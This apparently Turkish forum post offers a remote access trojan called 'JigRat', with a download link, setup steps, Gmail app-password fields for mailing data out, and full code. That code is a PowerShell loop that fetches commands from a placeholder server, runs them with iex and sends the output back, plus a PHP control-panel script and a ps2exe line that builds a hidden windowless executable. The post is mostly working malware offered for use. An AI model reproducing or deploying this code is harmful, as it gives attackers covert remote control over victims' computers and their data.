Virüstotal: https://www.virustotal.com/gui/file/...81c1?nocache=1
İndirme linki
https://dosya.co/kq3gbrlohrbd/JigRat-v1.zip.html
pip3 install --upgrade pip3
pip3 install pyinstaller
pip3 install pycryptodome
pip3 install requests
pip3 install Pillow
pip3 install pywin32Bu alana gmailinizi girin çift faktor açıp uygulama şifresi alın.
gonderen = ''
alici = ''
sifre = ''
| Orjinal boyutta görüntüle (Bu resim istenilenden daha büyük bir boyuta sahip olduğundan dolayı boyutlandırıldı) |
Powershell Script kodu: rat.ps1
while(2 -eq 2){
$url = "http://domain.com/get.php?ip=1";
$asd = Invoke-RestMethod -Uri $url -Method Get;
if($asd -ne ""){
$req=iex($asd);
$req;
$urlx = "http://domain.com/get.php?log=$req";
Invoke-RestMethod -Uri $urlx -Method Get;
}
}Php kodu: get.php
<?php
if (isset($_GET['ip'])) {
echo '/*PowerShell kodu*/';
}elseif (isset($_GET['log'])) {
$log=$_GET['log'];
$loge=fopen("log.txt", "a+");
fwrite($loge, $log);
fclose($loge);
}?>Gerekli kütüphane:
Install-Module -Name ps2exeBuilder:
ps2exe .\rat.ps1 out.exe -noconsole
0 Yorumlar